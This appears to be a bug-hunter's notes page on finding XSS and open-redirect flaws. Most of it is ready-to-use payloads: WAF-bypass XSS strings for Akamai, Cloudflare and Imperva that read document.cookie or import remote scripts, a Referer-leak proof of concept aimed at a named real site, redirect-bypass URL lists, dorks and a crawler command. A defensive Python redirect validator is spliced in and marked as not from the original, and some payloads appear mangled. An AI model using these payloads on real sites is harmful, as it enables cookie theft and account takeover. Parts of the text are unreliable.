XSS hunting tools and resources

2024-05-18 09:22:40

XSS

  1. Test different encodings and check for any odd behaviour
    1. <"'`--!>
    2. If it is reflected as &lt < --> test double encoding
    3. https://github.com/InfoSecOne/ghettoBypass
    4. https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
  2. Reverse-engineer the developer's thinking

CSP

  • CSP audit tool

mitsecXSS">
"><img src onerror=document.body.appendChild(Object.assign(document.createElement('script'),{src:'https:'.concat(String.fromCharCode(47)).concat(String.fromCharCode(47)).concat('externaljshere')}));>

Waf

Akamai JSi 
';k='e'
top['al' k 'rt'](1)//
'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'+'rt'](document+cookie)>

CloudFlare HTMLi 
<Img Src=OnXSS OnError=alert(1)> 
<Img Src=OnXSS OnError=confirm(document.cookie)>

Imperva HTMLi 
<Img Src=//X55.is OnLoad=import(Src)>

Tools and resources

  • cheat-sheet
  • Dom-xss-burp

Referer xss

  • window.history.replaceState() rewrites the current history entry, which replaces the Referer sent afterwards
  • https://webhook.site/
  • CRLF
<body>
<a
href="https://www.marksandspencer.com.tr/cerez-politikasi?1111"
referrerpolicy="unsafe-url"
>
click me
</a>
<script>
window.history.replaceState(null,"","1.html")
</script>
</body>

URL redirect

During the redirect process it will

Deeper exploitation

  1. window.location: look for XSS
  2. Back-end check: look for SSRF

bypass

/xxx.com
//xxx.com
\xxx.com
//xxx.com
//domain.com@xxx.com
//xxx.com
https://xxx.com/domain.com
https://xxx.com%23.domain.com
https://xxx.com?c=.domain.com (# also works)
////xxx.com
////xxx.com
https://domain.computer/
https://domain.com.xxx.com
/
/xxx.com(	 , , , , /)
/xxx.com
//google。com


& ? # /  
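As an added defensive example (not code from the original post), a Python allow-list check for a redirect parameter that collapses each bypass shape in the list above to a safe default; `domain.com` stands for the application's own host and `xxx.com` for the external host, as in the list, and both are constructed values.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed allow-list for this example; a real app would load its own hosts.
ALLOWED_HOSTS = {"domain.com", "www.domain.com"}
SAFE_DEFAULT = "/"


def safe_redirect_target(raw: str) -> str:
    """Return a redirect target that can only land on ALLOWED_HOSTS.

    Accepts a same-origin path ("/account") or an absolute https URL whose
    host is exactly allow-listed; every other shape, including each bypass
    listed above, collapses to SAFE_DEFAULT.
    """
    if not raw or len(raw) > 2048:
        return SAFE_DEFAULT
    # Browsers treat "\" like "/" in http(s) URLs ("\xxx.com", "/\xxx.com")
    # and fold full-width dots ("google。com" -> "google.com"), so reject any
    # backslash, control character or non-ASCII character outright.
    if "\\" in raw or not raw.isascii() or any(ord(c) < 0x20 for c in raw):
        return SAFE_DEFAULT
    # Same-origin path: exactly one leading "/" ("//xxx.com" is scheme-relative).
    if raw.startswith("/"):
        return SAFE_DEFAULT if raw.startswith("//") else raw
    parts = urlsplit(raw)
    if parts.scheme != "https":
        return SAFE_DEFAULT
    # urlsplit resolves userinfo, so "https://domain.com@xxx.com" has hostname
    # "xxx.com"; refuse credentials in the URL regardless of the host.
    if parts.username is not None or parts.password is not None:
        return SAFE_DEFAULT
    try:
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return SAFE_DEFAULT
    # Exact host match: "domain.computer", "domain.com.xxx.com" and
    # "xxx.com%23.domain.com" are all different strings from "domain.com".
    host = parts.hostname or ""
    if host not in ALLOWED_HOSTS:
        return SAFE_DEFAULT
    netloc = host if port is None else f"{host}:{port}"
    # Rebuild without userinfo or fragment so nothing smuggled survives.
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))
```

Only the returned string should ever reach the Location header; the raw parameter is never echoed.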

google dork

inurl:url= | inurl:return= | inurl:return_url= | inurl:rUrl=| inurl:r_url= | inurl:next= | inurl:cancelUrl= | inurl:goto= | inurl:follow= | inurl:returnTo= | inurl:history= | inurl:redirect= | inurl:redirectTo= | inurl:redirectUrl= | inurl:goback= | inurl:redir= | inurl:redirUrl= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com

gospider

gospider -w -r -a -s https://wwww.xxx.com  | grep -E "callback|/|redirect|url=|return|rurl|r_url|next|cancelUrl|goto|follow|returnto|history|goback|redir=|ret=|r2=|page=|jump=|target="

Waf xss payload

"><img/src/onerror=import('//domain/')>"@yourdomain
013371337;ext=<img/src/onerror=import('//domain/')>

<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert&#0000000040document.cookie)>
<svg onload=alert&#0000000040"1")><””>
<Img Src=//X55.is OnLoad=import(Src)>

"><svg onmouseover="confirm&#0000000040document.domain)
<Img Src=OnXSS OnError=confirm(1337)>
'>ejj4sbx5w4o
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle=" a b c " popover id=x>Hvita</hvita>")
<a/href="javascript:Reflect.get(frames,'ale' 'rt')(Reflect.get(document,'coo' 'kie'))">ClickMe
<Script>window.valueOf=alert;window+1</Script>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)

"><form onformdata=window.confirm(cookie)><button>XSS here<!--
1"onfocus='alert(document.cookie)' autofocus=
1"onfocus='window.alert(document.cookie)' autofocus=
"><
